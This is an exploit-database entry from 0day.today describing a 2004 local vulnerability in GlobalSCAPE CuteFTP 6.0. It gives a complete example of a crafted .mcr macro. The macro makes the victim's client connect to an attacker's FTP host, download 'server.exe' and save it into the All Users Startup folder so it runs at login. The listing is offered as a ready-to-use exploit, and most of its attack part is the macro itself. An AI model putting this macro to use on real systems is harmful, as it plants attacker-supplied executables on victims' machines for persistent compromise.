[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GlobalSCAPE - CuteFTP macros (*.mcr) Local Vulnerability

Author
ATmaCA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7365
Category
local exploits
Date add
27-09-2004
Platform
windows
========================================================
GlobalSCAPE - CuteFTP macros (*.mcr) Local Vulnerability
========================================================



Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: atmaca@prohack.net
web: http://www.prohack.net
*/

--The bug:

Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\




#  0day.today [2024-12-24]  #